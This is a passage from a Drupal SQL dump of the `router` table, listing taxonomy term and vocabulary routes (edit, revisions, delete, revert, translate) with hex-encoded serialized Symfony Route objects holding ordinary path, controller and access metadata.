343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31333b733a31343a227061747465726e4f75746c696e65223b733a32333a222f7461786f6e6f6d792f7465726d2f252f64656c657465223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.taxonomy_term.edit_form', '/taxonomy/term/{taxonomy_term}/edit', '/taxonomy/term/%/edit', 13, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33353a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32313a227461786f6e6f6d795f7465726d2e64656661756c74223b733a363a225f7469746c65223b733a393a2245646974207465726d223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32303a227461786f6e6f6d795f7465726d2e757064617465223b733a31333a227461786f6e6f6d795f7465726d223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a227461786f6e6f6d795f7465726d223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34393a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5c642b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31333b733a31343a227061747465726e4f75746c696e65223b733a32313a222f7461786f6e6f6d792f7465726d2f252f65646974223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.taxonomy_term.field_ui_fields', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/fields', '/admin/structure/taxonomy/manage/%/overview/fields', 123, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f6669656c6473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a36323a225c44727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e6669674c697374436f6e74726f6c6c65723a3a6c697374696e67223b733a363a225f7469746c65223b733a31333a224d616e616765206669656c6473223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33313a2261646d696e6973746572207461786f6e6f6d795f7465726d206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38373a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f6669656c6473247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31363a222f6f766572766965772f6669656c6473223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132333b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f6669656c6473223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.taxonomy_term.revision', '/taxonomy/term/{taxonomy_term}/revision/{taxonomy_term_revision}/view', '/taxonomy/term/%/revision/%/view', 53, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36393a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7265766973696f6e2f7b7461786f6e6f6d795f7465726d5f7265766973696f6e7d2f76696577223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35383a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e746974795265766973696f6e56696577436f6e74726f6c6c6572223b733a31353a225f7469746c655f63616c6c6261636b223b733a36353a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e746974795265766973696f6e56696577436f6e74726f6c6c65723a3a7469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a33363a227461786f6e6f6d795f7465726d5f7265766973696f6e2e76696577207265766973696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a31333a227461786f6e6f6d795f7465726d223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a323a7b733a343a2274797065223b733a32393a22656e746974795f7265766973696f6e3a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a33303a22706172616d636f6e7665727465722e656e746974795f7265766973696f6e223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39363a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b292f7265766973696f6e2f283f503c7461786f6e6f6d795f7465726d5f7265766973696f6e3e5b5e2f5d2b2b292f76696577247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f76696577223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f7265766973696f6e223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a35333b733a31343a227061747465726e4f75746c696e65223b733a33323a222f7461786f6e6f6d792f7465726d2f252f7265766973696f6e2f252f76696577223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.taxonomy_term.revision_delete_form', '/taxonomy/term/{taxonomy_term}/revision/{taxonomy_term_revision}/delete', '/taxonomy/term/%/revision/%/delete', 53, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7265766973696f6e2f7b7461786f6e6f6d795f7465726d5f7265766973696f6e7d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32393a227461786f6e6f6d795f7465726d2e7265766973696f6e2d64656c657465223b733a363a225f7469746c65223b733a31353a2244656c657465207265766973696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a33383a227461786f6e6f6d795f7465726d5f7265766973696f6e2e64656c657465207265766973696f6e223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a323a7b733a31333a227461786f6e6f6d795f7465726d223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a323a7b733a343a2274797065223b733a32393a22656e746974795f7265766973696f6e3a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a33303a22706172616d636f6e7665727465722e656e746974795f7265766973696f6e223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39383a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b292f7265766973696f6e2f283f503c7461786f6e6f6d795f7465726d5f7265766973696f6e3e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f7265766973696f6e223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a35333b733a31343a227061747465726e4f75746c696e65223b733a33343a222f7461786f6e6f6d792f7465726d2f252f7265766973696f6e2f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.taxonomy_term.revision_revert_form', '/taxonomy/term/{taxonomy_term}/revision/{taxonomy_term_revision}/revert', '/taxonomy/term/%/revision/%/revert', 53, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7265766973696f6e2f7b7461786f6e6f6d795f7465726d5f7265766973696f6e7d2f726576657274223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32393a227461786f6e6f6d795f7465726d2e7265766973696f6e2d726576657274223b733a363a225f7469746c65223b733a31353a22526576657274207265766973696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32393a227461786f6e6f6d795f7465726d5f7265766973696f6e2e726576657274223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a323a7b733a31333a227461786f6e6f6d795f7465726d223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b613a323a7b733a343a2274797065223b733a32393a22656e746974795f7265766973696f6e3a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a33303a22706172616d636f6e7665727465722e656e746974795f7265766973696f6e223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39383a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b292f7265766973696f6e2f283f503c7461786f6e6f6d795f7465726d5f7265766973696f6e3e5b5e2f5d2b2b292f726576657274247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f726576657274223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f7265766973696f6e223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b693a313b733a32323a227461786f6e6f6d795f7465726d5f7265766973696f6e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a35333b733a31343a227061747465726e4f75746c696e65223b733a33343a222f7461786f6e6f6d792f7465726d2f252f7265766973696f6e2f252f726576657274223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.taxonomy_term.version_history', '/taxonomy/term/{taxonomy_term}/revisions', '/taxonomy/term/%/revisions', 13, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34303a222f7461786f6e6f6d792f7465726d2f7b7461786f6e6f6d795f7465726d7d2f7265766973696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c56657273696f6e486973746f7279436f6e74726f6c6c6572223b733a363a225f7469746c65223b733a393a225265766973696f6e73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a33323a227461786f6e6f6d795f7465726d2e7669657720616c6c207265766973696f6e73223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31343a22656e746974795f747970655f6964223b733a31333a227461786f6e6f6d795f7465726d223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a227461786f6e6f6d795f7465726d223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a7461786f6e6f6d795f7465726d223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35373a227b5e2f7461786f6e6f6d792f7465726d2f283f503c7461786f6e6f6d795f7465726d3e5b5e2f5d2b2b292f7265766973696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7265766973696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a227461786f6e6f6d795f7465726d223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f7461786f6e6f6d792f7465726d223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a227461786f6e6f6d795f7465726d223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31333b733a31343a227061747465726e4f75746c696e65223b733a32363a222f7461786f6e6f6d792f7465726d2f252f7265766973696f6e73223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.taxonomy_vocabulary.add_form', '/admin/structure/taxonomy/add', '/admin/structure/taxonomy/add', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31323a225f656e746974795f666f726d223b733a32373a227461786f6e6f6d795f766f636162756c6172792e64656661756c74223b733a31343a22656e746974795f747970655f6964223b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a31353a225f7469746c655f63616c6c6261636b223b733a35363a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a6164645469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f616464223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.taxonomy_vocabulary.collection', '/admin/structure/taxonomy', '/admin/structure/taxonomy', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f61646d696e2f7374727563747572652f7461786f6e6f6d79223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f6c697374223b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a363a225f7469746c65223b733a383a225461786f6e6f6d79223b733a31363a225f7469746c655f617267756d656e7473223b613a303a7b7d733a31343a225f7469746c655f636f6e74657874223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a34343a2261646d696e6973746572207461786f6e6f6d792b616363657373207461786f6e6f6d79206f76657276696577223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33323a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d79247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f7374727563747572652f7461786f6e6f6d79223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32353a222f61646d696e2f7374727563747572652f7461786f6e6f6d79223b733a383a226e756d5061727473223b693a333b7d7d, 3);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.taxonomy_vocabulary.config_translation_overview', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/translate', '/admin/structure/taxonomy/manage/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36343a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38313a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223